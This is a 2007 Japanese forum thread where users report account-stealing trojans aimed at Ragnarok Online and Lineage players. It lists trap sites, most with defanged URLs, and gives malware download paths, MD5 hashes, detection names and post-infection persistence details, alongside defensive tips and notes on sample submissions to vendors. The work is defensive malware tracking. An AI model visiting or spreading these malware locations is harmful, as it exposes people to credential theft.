一番いいのは、理解した上で日々更新するぐらいの姿勢になる事だろうけど。

445 名前:(^ー^*)ノ〜さん:07/05/20 15:46 ID:9ElOLeej0
まぁ俺も最初そこで迷った。やっぱり判る人に確認して欲しいってのはあるよ。

446 名前:(^ー^*)ノ〜さん:07/05/20 15:55 ID:Cs11Lga/0
hostsを変更するなら、セットでping,nslookupあたりの使い方も覚える。
どちらもnetwork diagnosticsに於いて基本のコマンドラインツールだし、機能解説のドキュメントは
web上に幾らでもある。

手段だけ学んで、原理に目を向けないと、道具に使われるだけのユーザーになってしまう。

447 名前:(^ー^*)ノ〜さん:07/05/20 15:58 ID:zmqmGI+70
http://www.abcoroti.com/~kimo/cgi-bin/all.html?1159355145
の中のkimo0903.jpg
画像が1KBとかめちゃめちゃ怪しいんだが垢ハックかな?
うっかり踏んじまって不安だわ。
誰か情報もとむ。

448 名前:(^ー^*)ノ〜さん:07/05/20 16:00 ID:p41jOIU40
tracertも覚えたほうがいいねぇ。
pathpingはちょっとびっくりした。

449 名前:(^ー^*)ノ〜さん:07/05/20 16:01 ID:1LjoMk5q0
※ このスレは『勇気が無くて見れないサイト解説スレ』ではありません

450 名前:447:07/05/20 17:56 ID:zmqmGI+70
>>449
すまんテンプレあったの気付かなかった。
【  アドレス   】 http://www■abcoroti■com/~kimo/cgi-bin/src/kimo0903■jpg
【気付いた日時】 07/05/20 15:30頃
【     OS    】 WinXP Version2002 SP2
【使用ブラウザ 】 IE7
【WindowsUpdateの有無】 不明
【 アンチウイルスソフト 】 ウイルスバスター2006
【その他のSecurty対策 】
【 ウイルススキャン結果】 ウイルスバスターで現在検索中
【スレログやテンプレを読んだか】 今から読むところです。
【hosts変更】無 
【PeerGuardian2導入】無
【説明】
 クリックし、画像が表示されずおかしいとおもい
画像の参照をみたところ、サイズが1KBだったので
不信に思い投稿してます

451 名前:(^ー^*)ノ〜さん :07/05/20 18:00 ID:8iPMB2av0
▲1▼ BOT露店不買運動の日です (Res:1) All First100 Last50 SubjectList ReLoad ▲1▼

1 名前:夢香 投稿日: 2007/05/19(土) 12:15:53
本日は BOT露店不買運動の日です。
御用とお急ぎでないかたはご協力お願いします。

皆さん忙しいようですが
無理せずゆっくり
できる範囲でいろいろやっていきましょう
BOT露店不買運動詳細はこちら
www■deco030-cscblog■com/
--------------------------------------------------------
ソースチェッカーで調べると
www■blog-livedoor■net/Ms06014.htm (名前のとおりMS06-014の虚弱性を突く奴)
www■blog-livedoor■net/test.cur (アニメーションカーソルの虚弱性を突く奴)

452 名前:(^ー^*)ノ〜さん:07/05/20 18:07 ID:f61Eb4zf0
>>450
スレ違いだ。おとなしくLiveROへ行け。

453 名前:447:07/05/20 18:24 ID:zmqmGI+70
>>452,449
すまん。自己解決した。
空白の対象に保存して、同じものを作ってみたらサイズが一致した。
txtにして見てみたがまったく同じだった。

454 名前:(^ー^*)ノ〜さん:07/05/20 20:10 ID:p41jOIU40
>>451
www■blog-livedoor■net/mangame.exe
UpackなMaran。

あとネタかもしれんが、とりあえず突っ込ませてくれ。
虚弱性じゃない。脆弱性(ぜいじゃくせい)。

455 名前:(^ー^*)ノ〜さん:07/05/20 20:55 ID:Pb3N3+pH0
今日何人もハックされたってチャットしてるの見たんだけど
またどこかRO系の掲示板に貼られたのかなぁ
癌方もRMTerの調査ができるなら、ハックも対応してくれればいいのに。
ハック対策も自己責任のうちだろうけど、やったもん勝ちの状況だから
ハックがあとを絶たないわけで。

456 名前:(^ー^*)ノ〜さん:07/05/20 21:32 ID:p41jOIU40
踏んだのが最近とは限らないんじゃない?
危機感無い人はパスワードを頻繁には変更しないだろうし、
ずっと前に踏んで抜かれていたのを今頃使われたのかも
(いつでも引き出せる預金みたいなもんだ)。

457 名前:(^ー^*)ノ〜さん:07/05/20 23:46 ID:kX0bObwS0
fc2のブログに繰り返し張られているURL。
ttp://www■grandchasse■com/wikblog

458 名前:(^ー^*)ノ〜さん:07/05/21 01:11 ID:F3lg5O7l0
>457
maplestorfyに繋いでbodg.curとzhixiaogui.exeを落とさせるタイプっぽい

459 名前:(^ー^*)ノ〜さん:07/05/21 01:16 ID:DWjR9i0f0
そのURLはうちも張られてたな。
コメント見て怪しいから削除したけど、やっぱりウィルスか。

460 名前:(^ー^*)ノ〜さん:07/05/21 01:23 ID:FwfeW/Zc0
>>457
www■maplestorfy■com/lunimkabuges/zhixiaogui■exe
が落ちてくる。>>402とMD5が一致したので、差し替えは行われていない模様。

461 名前:(^ー^*)ノ〜さん:07/05/21 08:13 ID:ty2GcRvV0
自分の絵のサイトに貼られてたので報告〜
http://www●rmt-navip●com/game/

462 名前:(^ー^*)ノ〜さん:07/05/21 19:13 ID:p7qSzk890
http://mohige.s253.xrea.com/pukiwiki.php?%3A%A5%AD%A5%E3%A5%F3%A5%DA%A1%BC%A5%F3

wikiの外部リンク飛ばして移動とかできるの?

463 名前:(^ー^*)ノ〜さん:07/05/21 19:28 ID:9Z3cDAHK0
wikiとサーバが一緒だから内部リンクと判断されたんじゃないか?

しかしFirefox限定キャンペーンって熱烈な(Firefoxの)ファンか

464 名前:(^ー^*)ノ〜さん:07/05/21 20:14 ID:7woBLyPs0
ROSVの掲示板は相変わらず、垢ハックほいほい状態ですね。殆どが既出かな。

http://bqdr■blog98■fc2■com/
http://nikang■blog79■fc2■com
http://www■cityblog-fc2web■com/boss/
http://www■d-jamesinfo■com/blog/
http://www■dtg-gamania■com/rormtga/
http://www■game62chjp■net/test/1087006635/
http://www■game-fc2blog■com/chaos
http://www■gameurdr■com/rormtga/
http://www■getamped-garm■com/chaos/
http://www■gsisdokf■net/online/
http://www■k5dionne■com/bbs
http://www■kotonohax■com/blog/nc■htm
http://www■livedoor-game■com/bbs
http://www■mbspro6uic■com/mbsplink
http://www■m-phage■com/bbs/
http://www■omakase-net■com/minamiblog/index■html
http://www■playsese■com/bbs/
http://www■rmt-trade■com
http://www■ro-bot■net/10657/
http://www■shoopivdoor■com/fczdun
http://www■southbound-inc■com/list■asp
http://www■ywdgigkb-jp■com/online/

465 名前:(^ー^*)ノ〜さん:07/05/21 21:41 ID:OVQH+K+o0
「オンラインゲームのパスワードが狙われている」、専門家が警告
ttp://itpro.nikkeibp.co.jp/article/NEWS/20070521/271719/

ユーザからはいまさらだが、やっと一般向けの記事にもなるようになったな

466 名前:(^ー^*)ノ〜さん:07/05/22 04:45 ID:GOI4JAoA0
垢ハックだけに限らずいい加減ネット関係の法規制進めて欲しいな
法規制が遅れているせいでネット社会では日本が発展途上国なんていわれてるザマだし

467 名前:(^ー^*)ノ〜さん:07/05/22 05:22 ID:QAnVS5qZ0
>>464の感染後調査
MD5の下はカスペでのウイルス名です。その隣はファイルの最終更新日(日本時間)です。

MD5:30D161292355A051A3E048DD5ECE005B www■zhangweijp■com/tt1/tt1■exe
Trojan-PSW.Win32.Nilage.bdy    2006/12/27
→ C:\Program Files\Internet Explorer\explorer.exe (レジストリHKCU\Software\Microsoft\Windows

NT\CurrentVersion\Windows\Loadに登録)
→ %WinDir%\system32\ccdll.dll

MD5:BCC22DEDB9D2AE01BF13A4AA6D4E7C5E www■zhangweijp■com/tmsn/tmsn■exe
Trojan-PSW.Win32.Agent.ka     2007/01/04
→ %WinDir%\system32\Kcrner.exe   (レジストリHKCU\Software\Microsoft\Windows\CurrentVersion\Runに登録)
→ %WinDir%\system32\Kcrner.dll

MD5:C72ACCE22CF7AF31F7988244243610F3 www■zhangweijp■com/tro/tro■exe
Trojan-PSW.Win32.Maran.by     2007/03/16
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\ojviewer.dll   (Winsock Providerに登録)

MD5:869F39CE797B135177241291363A8C68 www■game-fc2blog■com/nairmt/ro■exe
Trojan-PSW.Win32.Maran.cj     2007/04/04
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\tj6viewer.dll   (Winsock Providerに登録)

MD5:2A08461A388D581B5E24E60828B7DB6C www■acyberhome■com/game/svch■exe
Trojan-PSW.Win32.Maran.cj     2007/04/19
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\tj7viewer.dll   (Winsock Providerに登録)

468 名前:(^ー^*)ノ〜さん:07/05/22 05:23 ID:QAnVS5qZ0
>>467の続き

MD5:DD1638033B51A139A13141B056DD4103 www■blog-livedoor■net/boss/mangame■exe
Trojan-PSW.Win32.Maran.ei     2007/05/08
MD5:D6DD2F9474CA0B3920A3CE8919C1E95A www■cityhokkai■com/games/server■exe
Trojan-PSW.Win32.Maran.ei     2007/05/08
MD5:ADBE924EE0A92E88E761465C6F29A845 www■game62chjp■net/test/1087006635/svch■exe
Trojan-PSW.Win32.Maran.ei     2007/05/08
MD5:62BEDB8221A85163C87BFBDA9CDA28D6 www■maplestorfy■com/sixiaogui/sigui■exe
Trojan-PSW.Win32.Maran.ei     2007/05/13
MD5:3CD5F9CDDC4073E767BCBAEC53CFEE76 www■mbspro6uic■com/mbsplink/xiaogui■exe
Trojan-PSW.Win32.Maran.ei     2007/05/17
MD5:BCCF3223180CC9073937F7E1DDCAD1ED www■ro-bot■net/10657/yan■exe
Trojan-PSW.Win32.Maran.ei     2007/05/08
上記6つに対して共通↓
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\tj9viewer.dll   (Winsock Providerに登録)

ここ最近は、Service&Winsock登録型一辺倒のようです。
トロイはなんらかの形で自動実行されるようレジストリなどを書き換えてくると思われますので、
SysInternalsのAutoRunsで怪しいプログラムが登録されていないか調べるのが、
一つの防御策になると思います。(ここ最近みたいにワンパターンだと楽なのですが)

469 名前:(^ー^*)ノ〜さん:07/05/22 08:51 ID:ml5gYZOB0
ttp://www.kaspersky.com/viruswatchlite
を見ていると今はMaran.feまでいるみたい。
たぶん(ROやリネージュといった)ターゲットではなく
構造や手法による分類なんだろう。

md %WinDir%\svchost.exe
md %WinDir%\system32\tj9viewer.dll
とかやっとけば短期的には潰せるかな。

470 名前: ◆sp4Sh9QXGI:07/05/22 11:12 ID:qWE42PFv0
まとめサイトのWeb拍手に来ていた奴。
URLについての調査http://www■extd-web■com/blog
木馬対策方法http://www■aehatena-jp■com/news/100658432/

中華どもは私を引っ掛けようとでも言うのでしょうか。

471 名前:(^ー^*)ノ〜さん:07/05/22 11:16 ID:2d5s57J80
>470
>429-430もそうだけど、まとめサイトの人やWikiをメンテする人って、中華からすれば
憎むべき敵だろうしね。
狙われるのも仕方が無いというか、有名税と考えるしかないんじゃないかな。

472 名前:467-468:07/05/22 11:21 ID:QAnVS5qZ0
ojviewer.dll, tj?viewer.dll の中身見ると、
最低でもjROとリネージュ(1の方)をターゲットとしているであろう文字列(↓)が埋まってた。
(それ以外のゲームをターゲットとしていそうな文字列は見つからなかった。暗号化されてるだけかもだけど)

211.13.228.22 (Ragexe-worldgroup1)
211.13.228.19 (Ragexe-worldgroup2)
211.13.228.20 (Ragexe-worldgroup3)
211.13.228.21 (Ragexe-worldgroup4)
211.13.228.23 (Ragurdrexe)

61.215.117.34 L1:Canopus(
61.215.117.36 L1:Arcturus(
61.215.117.37 L1:Rigel(
61.215.117.33 L1:Sirius(
61.215.117.35 L1:Vega(Non-PvP)(
61.215.117.38 L1:Altair(Non-PvP)(

>>469
その方法で潰せることを確認。現状フォルダを消して来たりはしないけど、
消されるのが心配な場合は、フォルダの中にEXE作って常時実行させとくとか。
(OSが限定されるけどソフトウェア制限のポリシーを設定する手もあり。ただしDLLは防げない)

ファイル名なんてノーコストで変えられるし、その気になれば存在しないファイル名を探すことも可能だから
脆い防御方法ではあるけど、フォルダ作るだけだから、駄目もとでやっとくのはいいかもしれない。

473 名前:(^ー^*)ノ〜さん:07/05/22 11:43 ID:ml5gYZOB0
>>472
ROとリネの両用なのは結構前からだね。
情報の送信先はさすがにベタには書いてない模様
(FFXIのトロイで逆襲されたからか?)。

普段aaaaでログオンしているならbbbbでログオンして
ファイルやフォルダを作成、bbbb以外のアクセス権を
全て削除するほうが手軽かな。bbbbはフルコンで。

474 名前:(^ー^*)ノ〜さん:07/05/22 17:20 ID:ml5gYZOB0
www■jpxpie6-7net■com/web/read_cgi/svchost.exe
www■jpxpie6-7net■com/svchost.exe
同じ物なので、お持ち帰りはお好きなほうを。2kBほどダイエット。
Upack圧縮で5%も削るのは難しいと思うんだけど、機能削減版?
ROだけとかリネだけとか。

Kasperskyで検知できず発射したところ「Maran.ff」として対応すると返答。
他はほぼ検知(Norton、McAfee、AntiVir、Avast!、BitDefender、NOD32など)。
AVGとトレンドマイクロには発射済み。

475 名前:(^ー^*)ノ〜さん:07/05/22 17:34 ID:AXjyF9sO0
乙です。セキュリティ会社も大変だ・・・

476 名前:(^ー^*)ノ〜さん:07/05/22 17:56 ID:VO7Xc8Wl0
>>474
乙ですよ。カスペはその対応の早さが安心だ

477 名前:(^ー^*)ノ〜さん:07/05/22 18:24 ID:ml5gYZOB0
返信のメールヘッダを見たら発射後10分で返信してる。はえーよ…。
トレンドマイクロの「受け取ったよ」自動返信メールよりはえーよ。
オンラインスキャンしたら既に検知した。

478 名前:(^ー^*)ノ〜さん:07/05/22 18:50 ID:AXjyF9sO0
その一万分の1でもどっかの会社に見習って欲しいもんで。

479 名前:(^ー^*)ノ〜さん:07/05/22 19:42 ID:2d5s57J80
>トレンドマイクロ、国内専門のセキュリティ対策に特化したラボ稼働
>WinnyやShareをクローリングして暴露ウイルスの検体も収集
>ttp://internet.watch.impress.co.jp/cda/news/2007/05/22/15786.html

カスペとかと比べてフットワークが軽いとは言えなかったバスターだけど
今後はフットワークが軽くなるかもしれない?

480 名前:(^ー^*)ノ〜さん:07/05/22 19:57 ID:QZAMJXiU0
フットワークもいいがプログラムも軽くしてくれと切実に

481 名前:(^ー^*)ノ〜さん:07/05/22 20:13 ID:+aePwDdK0
下がりすぎなので上げ
カスペ頑張ってるなぁ、期限切れたらノートン先生からカスペに乗り換えよう

482 名前:(^ー^*)ノ〜さん:07/05/22 20:14 ID:+aePwDdK0
上げてNEEEEE orz

483 名前:(^ー^*)ノ〜さん:07/05/22 20:21 ID:ml5gYZOB0
>>479
「TRACKING」(「受け取ったよ」の自動返信)は早いのに
「CLOSING」が3日後とかに来るNortonよりははるかに早いよ。
驚異的なのは、この「CLOSING」で解決していないこと。
「サーバでスキャンしたけど有害とは認識できなかったので
解析チームにまわすね」という自動返信なんだ。
サーバの中の小人さんが手作業してるんじゃないかと。
ちなみに解析チームにまわされた後の返信は来ない。

同じ3日もあればトレンドマイクロからは受け取ったよ、
命名したよ、パターンリリース(CPR)するよ、したよ、
の告知が(ちょっとウザいほど)来る。

484 名前:(^ー^*)ノ〜さん:07/05/22 20:22 ID:hc4N1JLo0
トレンドマイクロは過去5回ぐらい検体送ったことあるけど、
パターンに対応するまで、約2営業日ぐらいかかる。
カスペル君の足元にも及ばないけど、まずまずの対応だと思う。

485 名前:(^ー^*)ノ〜さん:07/05/22 21:35 ID:2d5s57J80
何となく癌の黒歴史を見直したくなって、まとめサイトを探してたら
「がんほーうぉっちwiki」(ttp://f55■aaa■livedoor■jp/~gunghow)という
ページに辿り着いたんですが、ここのページの事を知ってる人は居ますか?

管理放棄されてるのか、外部リンクのほぼ全てが罠アドレスに置き換わってて
修正しようにもどこから手をつけていいのか判らない状態……
今までこのスレで報告を見た事が無いのと荒れ具合からして、かなりの期間
放置され続けてた&見る人が皆無だった、とは思うのですが。

あまりにも危険すぎるサイトになってるんですが、検体収集所じゃないですよね?

486 名前:(^ー^*)ノ〜さん:07/05/22 21:50 ID:WFq5jNd60
>>485
恐らくは、件のキャンギャル告発の頃に作成されたサイトと思われるが。
旧母乳などからもリンクされてはいたので、それなりの閲覧者数はあったのでは。
……と思ったら、
>since:2004/08/28
の表記があったので、まあそういうことだろう。

で、ここのFrontPageの改竄内容でぐぐって見たら、中々けったいなページに辿り着いた。
以下、その投稿内容。
>めッちゃ仲良くなれるメル友募集中 vivianさん
>
>住みゎどこでも男女どっちでもぃぃです⌒+゚
>高校生以上の人が嬉しぃッ
>プロフ書ぃて気軽にメールしてね
>http://www■deco030-cscblog■com/game/ (2007年04月20日 12時58分46秒)

この組み合わせはないだろ、常識的に考えて。
だが、潜在的な罹患者は確実に増えているだろうと推測される。
仮に連中が、BackDoorなどをフル活用して別の用途に転用した場合、かなりの脅威にもなり得るな。

487 名前:(^ー^*)ノ〜さん:07/05/22 22:15 ID:ml5gYZOB0
まー放置してるんだろうな。
WikiやBlogやBBSはやる気なくなったら閉鎖すべきだな。
不正アクセスして改竄と敷居が高いただのHTMLを置いてあるサイトに比べて
子供でも危険なリンクを置けるから。

488 名前:(^ー^*)ノ〜さん:07/05/22 22:55 ID:hc4N1JLo0
本日差し替えられたと思われるff型トロイの感染後調査

MD5:40B8E67AB40577E1BEE3AEBBCEFC2BB1 www■game62chjp■net/test/1087006635/svch■exe
MD5:6B801516A2EDEF5B39B17A4D45EA658C www■cityhokkai■com/games/server■exe
MD5:BD2643AE260EB7613358F7EF583CEC23 www■blog-livedoor■net/mangame■exe
MD5:BD2643AE260EB7613358F7EF583CEC23 www■blog-livedoor■net/boss/mangame■exe
MD5:6B523E3DBCD0A16FA72AC8D240862EF3 www■jpxpie6-7net■com/web/read_cgi/svchost■exe
MD5:6B523E3DBCD0A16FA72AC8D240862EF3 www■jpxpie6-7net■com/svchost■exe

上記すぺてに共通↓
カスペルスキー検出名:Trojan-PSW.Win32.Maran.ff
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\tjviwer.dll   (Winsock Providerに登録)

今まで主流だったei型と比べて違う点は
・svchost.exeのファイルサイズが34k → 22kまでシェイプアップしてる(dllの方は今までと同じサイズ)
・dllのファイル名がtj9viewer.dll → tjviwer.dll に変わった(新型の方はviewerではなくviwerなので注意)
相変わらず、jROとリネージュTの共用トロイっぽいです。また新型が現れたら報告しにきま。

489 名前:(^ー^*)ノ〜さん:07/05/22 23:45 ID:ml5gYZOB0
乙。一気に差し替えたな…。

490 名前:(^ー^*)ノ〜さん:07/05/23 01:38 ID:LiThnJxz0
>>488
乙。NOD32で確認してみたが、全部亜種扱いではあるものの、検出可能でした。

491 名前:(^ー^*)ノ〜さん:07/05/23 03:01 ID:h69Txles0
>>488のファイルすべてバスター(TrendMicro)でTSPY_MARAN.Dとして検出できることを確認しました。

492 名前:(^ー^*)ノ〜さん:07/05/23 16:03 ID:iP5TO9IZ0
福建人の罠はてなダイアリー再び、つくりたて。
d■hatena■ne■jp/sh830525/20070520
パクリ記事の文末にrunbal-fc2web入り。

493 名前:(^ー^*)ノ〜さん:07/05/23 16:05 ID:/RzDwwZw0
ne.jpやられると間違えやすいな・・・これは要警戒

494 名前:(^ー^*)ノ〜さん:07/05/23 16:12 ID:HjA5t/PF0
それってfc2(正規)に作られた罠サイトと同様、はてなに言って取り締まって貰う以外に
対応策が無いような。
なんちゃってドメインならhostsなりPG2なりで防げるけど、はてなが対応するまでは
注意するしか手がないねぇ……

495 名前:(^ー^*)ノ〜さん:07/05/23 18:21 ID:iP5TO9IZ0
492のをここに投稿する前に、はてなには苦情を入れておいたのだが
速攻で公開停止、対応は良好だ。

−−−ここから
はてなスタッフの○○と申します。
いつもはてなをご利用いただき、ありがとうございます。

このたびはお知らせいただきありがとうございました。
該当のダイアリーにつきましては運営者に警告の上、公開停止とさせて
いただきました。

これからもお気づきの点などおありの際には、ぜひお知らせください。
どうぞよろしくお願い申し上げます。
−−−ここまで

496 名前:(^ー^*)ノ〜さん:07/05/23 18:26 ID:bf3MGeVG0
どっかの運営会社と違って素晴らしい対応だな

497 名前:(^ー^*)ノ〜さん:07/05/23 19:50 ID:4q4O+KVm0
どっかだけが異常なんだけどな

498 名前:(^ー^*)ノ〜さん:07/05/23 20:32 ID:IvOUlGEB0
おお、hatenaはえーな。fc2は結構残ってたような…。

499 名前:(^ー^*)ノ〜さん:07/05/23 22:44 ID:LiThnJxz0
だって、fc2の本拠は日本じゃないし、spam送ってくることもあるし(苦情入れても止まらなかったので
結局フィルターであぼんしたが)まともな対応するのを期待する方が間違ってるだろ。

と、ここまで書いてなんだが、そろそろ雑談スレに移動すべき話題じゃないか?

500 名前:(^ー^*)ノ〜さん:07/05/24 09:00 ID:wdaeohkq0
福建人の罠Wiki発見。
このURLからして福建人自ら登録たもので間違いなさげ。
zb00999はライブドアの罠ブログでも使われているし。
内容を確認したので苦情を入れておいたがどうなるか。

www24■atwiki■jp/zb00999

501 名前:(^ー^*)ノ〜さん:07/05/24 09:33 ID:mTrqEjvW0
罠ドメインはコストかかるのと、hostsやPG2で対策されるとどうしようもないから
既存のサービスを利用した罠サイト構築に向かい出したんだろうか?

管理が甘い所(fc2とか)だと長生きするし、hosts等のブロックでは阻止できないし。

502 名前:(^ー^*)ノ〜さん:07/05/24 09:52 ID:yjCzmmC60
罠ドメインの方にはダウンローダのスクリプトやトロイ本体が置かれているのに対し、
日本のブログやWikiには罠ドメインへのリンクしか貼られていない。

というのが今までの傾向。
あまり詳しく知らないのだが、ブログやWikiに直接罠を置いてこないのは、
技術的に簡単にはできないからなのだろうか??
直接置いてこられたら、hostsやPG2でのブロックが難しくなってくるわけだが。

503 名前:(^ー^*)ノ〜さん:07/05/24 10:37 ID:kS461Xcr0
バイナリはアップできないか、面倒なんじゃないかな。
Wikiで編集押してもぱっと見テキストしかいじれない。

504 名前:(^ー^*)ノ〜さん:07/05/24 13:30 ID:HMo6hH4Z0
blogはやったことがないので分かりませんが。
wikiの場合、バイナリをアップしても編集でリンク付けさせないと意味ないですからね。
リンク付けも置いた場所によって書き換えないといけないし、
アップされたファイル名も表示される方が多いのですぐにバレちゃう。
それとサイトによっては、バイナリアップ時にPASSを入れないと無理なところもある。

wikiの性質上、外部へのリンクは編集で記述したらすぐに出来てしまうし、
リンク定型文も分かっているから、ソースを開いて置換させる方が早い。

まぁ、直接置くのは面倒ということだと思います。

505 名前:(^ー^*)ノ〜さん:07/05/24 17:24 ID:WUE20xjC0
報告です。
自分のサイト(ROメインではない)の掲示板なのですが
FKCfb-01p2-88.ppp11.odn.ad.jpが来ていました。
(アク解みてもどこからたどってきたのか不明)

内容は過去ログから適当にコピペしたもので、友人のHPリンク先として
http://www■soultakerbbs■net/が貼られていました。

>>273をみて、odnのサイト内に
・ E-Mailによるお問い合わせ
  net-abuse@odn.ad.jp
を見つけたので、通報してみます。

506 名前:(^ー^*)ノ〜さん:07/05/24 17:46 ID:QFi3AFG20
>>504
blogの場合は、レンタル型の場合、添付可能なファイルがmedia系に限定されている事が多いかと。
自力でMTなりを設置した場合だと、基本的にはどんなファイルでも添付できる。サイズ制限はあるが。

あと、>>500の@Wikiの場合、拡張機能としてインラインhtmlを記述可能になっている。
これを利用して、iframe等を仕込む事が可能かどうか不明だが、警戒するに越したことはない。

507 名前:(^ー^*)ノ〜さん:07/05/24 22:29 ID:9LhjEF+d0
垢ハックを踏んでしまったのですが、どうしたらいいでしょうか?

508 名前:(^ー^*)ノ〜さん:07/05/24 22:32 ID:t0e0XwbU0
>>507
安全な環境からのパス変更
垢ハックの除去、あるいは、OS入れなおし(データのバックアップは自己責任で)

安全な環境とか、除去とかわからないのがどこか具体的に質問を。
なお、質問の際には、テンプレを埋めてくれ。

509 名前:(^ー^*)ノ〜さん:07/05/25 09:02 ID:G9vd26XH0
とりあえず踏んだ後にパスワードを打つ行動さえしていなければ安全なので、
そのPCでは絶対にパスを変えに行かないように。他PCがあれば他PCのウィルスをチェックしてそっちでやろう。
あとネカフェも危険性がある。

510 名前:(^ー^*)ノ〜さん:07/05/25 11:45 ID:/7PCAjPI0
【  アドレス   】 http://serio■ne■jp/~little-witch/
【気付いた日時】 2007.05.25
【     OS    】 XP SP2
【使用ブラウザ 】 DonutP
【WindowsUpdateの有無】 先週末だから18日ぐらいかな
【 アンチウイルスソフト 】 NortonInternetSecurity2005
【その他のSecurty対策 】 Spybot、Adwre
【 ウイルススキャン結果】 今カスペでスキャン中
【スレログやテンプレを読んだか】 Yes
【hosts変更】無
【PeerGuardian2導入】無
【説明】
本来のサイト→http://www■serio■ne■jp/~little-witch/
のwww抜けでした。
踏んだところ真っ白なサイズ0のページに飛んだため、とりあえず
カスペオンラインスキャンとノートン先生にスキャンしてもらってます。
しかしながらとりあえず白いページ出たらOSクリーンしようかと思ってましたので
スキャン終わりしだいOS再インスコしてきます。
Url自体悪質なものだったのかどうかわかりませんが・・・・・・

511 名前:(^ー^*)ノ〜さん:07/05/25 11:54 ID:Zd2Zkoaz0
>>510
それは、ページが存在しないときに飛ばされるページだと思う。
文面が一切記入されていないので真っ白だが、垢ハックの危険は(少なくとも現時点では)ない。

512 名前:(^ー^*)ノ〜さん:07/05/25 11:58 ID:t0srvg280
アカハックだと確定できないならLiveROの雑談スレでと何度言えば。
そこは無害。

513 名前:(^ー^*)ノ〜さん:07/05/25 11:59 ID:JoSb/FYz0
>>510
本人のBlogによると、
それは旧アドレスで、今は移転済み。中身はないっぽい
今はwwwが必須らしい。

514 名前:(^ー^*)ノ〜さん:07/05/25 12:05 ID:LH/wi4Et0
>510
それ、罠ページと全く関係ないから。
一言で言えばSerio-netの仕様で、りとるりとるうぃっちだけの話じゃない。
ttp://www.serio.ne.jp/
ttp://serio.ne.jp/
それぞれアクセスすれば判ると思う。


それと白紙ページが罠ページというわけじゃない。
罠ページの中には白紙状態のページがある、というだけ。

他のサイトをパクって偽装して罠を仕込ませる場合もあるから、白紙かどうかで
罠サイトかどうかの判断をする事は出来ない。

515 名前:(^ー^*)ノ〜さん:07/05/25 12:11 ID:+m/qLt+80
>>510
www.serio.ne.jp = 219.117.209.163
serio.ne.jp = 219.117.209.162

白いページ=危険という発想はどうなんだ。
確かに空のコンテンツに罠スクリプトだけ置かれていて、
危険である可能性はあるのだが・・・
ソースチェッカー使うなりして、罠かどうか調べようぜ。

>>511
どうでもいいことだが、serio.ne.jp上で出鱈目なファイル名打ち込むと、404が返ってくるが
serio.ne.jp/~little-witch/に関しては200が返ってくる。

516 名前:(^ー^*)ノ〜さん:07/05/25 12:15 ID:Zd2Zkoaz0
>>515
空白ページ置いてある(本来は移転先を書く?)だけかも。
とにかく、今回の相談は、510の勘違いということで終了だな。

517 名前:(^ー^*)ノ〜さん:07/05/25 20:04 ID:AIYETt/d0
www無しの方は、301を返してくるようだが。
どちらにしても、通常は.htaccessによるリダイレクトで、www有りの方へ飛ばされる模様。
ブラウザの設定か何かで、リダイレクトを禁止してはいないだろうか。

518 名前:515:07/05/26 00:21 ID:r7/Sn2OB0
>>517
うお、本当だ。301が返ってくる。ちゃんとリダイレクトされるね。
昼間試したときは、確かに200が返って来た。
(FirefoxのLive HTTP Headerと、あとソースチェッカーでも確認した)
管理人さんが設定を変更したんだろう。

519 名前:(^ー^*)ノ〜さん:07/05/26 01:20 ID:K9LRJ3cx0
はーい新型Maranのお時間ですよ orz
今回は54kBとちょっと太っちゃいました。てへ。

www■jpxpie6-7net■com/web/read_cgi/svchost.exe
www■jpxpie6-7net■com/svchost.exe
上2つ同じ。

www■soultakerbbs■net/388465/svch.exe
こちらはsoultakerbbs■netをahatena■comにしても同じ。

AntiVir・BitDefender・NOD32・Nortonが検知
(検知する名前が怪しげな、びみょ〜なのもある)。
Kaspersky・McAfee・Dr.WEB・Avast!・AVGがスルー。
各社に提出しました。
Kasperskyからは早速Maran.fkにすると返答あり。
最近はこの犯人はKasperskyで検知できなければいいや、な感じで
作ってる気がするので別なのも併用したほうがいいかも。
最近のテストを見てるとAVIRA AntiVirがやたらと強いので、
可能ならおすすめしたいところです。

520 名前:(^ー^*)ノ〜さん:07/05/26 01:29 ID:K9LRJ3cx0
あ、バスターにも発射しました。

521 名前:(^ー^*)ノ〜さん:07/05/26 03:13 ID:K9LRJ3cx0
さらに太って56kB。でもKasperskyでMaran.cj。古い?
www■acyberhome■com/game/svch.exe
www■acyberhome■com/link/server.exe
www■acyberhome■com/news/svch.exe
下2つは同じなので上2つをスキャン。
検知 AntiVir・Avast・BitDefender・Kaspersky・NOD32・Norton・バスター
スルー AVG・McAfee
上はスルーで下は検知と不思議な結果を見せたのはDr.WEB。
どうしたMcAfee…。WebImmuneにアップしたけど間違いじゃなかった。
>>519 がKaspersky狙いならこちらはMcAfee狙いと判断
(AVGってことはないだろう)。各社に提出しました。

順番が前後しますが、こちらは24日製造、
>>519 は25日製造となっております。

522 名前:(^ー^*)ノ〜さん:07/05/26 03:51 ID:EGaEc4Ke0
新型maran(>>519)の感染後調査

MD5:4FD6CE2F1835F6924D416CFB5C8C71B6 www■jpxpie6-7net■com/svchost■exe
MD5:F12EF3B627FF7F70BA2855D337C25985 www■soultakerbbs■net/388465/svch■exe

上記すぺてに共通↓
カスペルスキー検出名:Trojan-PSW.Win32.Maran.fk
→ %WinDir%\svchost.exe        (サービスに登録 → サービス名ADIDown 表示名Power Adapter)
→ %WinDir%\system32\tjviwer.dll   (Winsock Providerに登録)
(感染後のファイルは共にTrojan-PSW.Win32.Maran.ffとして検出されます)

jpxpie6-7netの方に関して、>>488で調べたファイルと比較してみましたが、
MD5:6B523E3DBCD0A16FA72AC8D240862EF3 www■jpxpie6-7net■com/svchost■exe (>>488
MD5:4FD6CE2F1835F6924D416CFB5C8C71B6 www■jpxpie6-7net■com/svchost■exe (今回)

上記2つに共通↓
MD5:17A6424A777022289C6B86D784F58C4F → %WinDir%\svchost.exe
MD5:D7C0D46F22B75E7526DA76A0CCE8FDB2 → %WinDir%\system32\tjviwer.dll

圧縮形式が変更されただけで、展開後に作成されるファイルは>>488で調査したものと同じものができるようです。
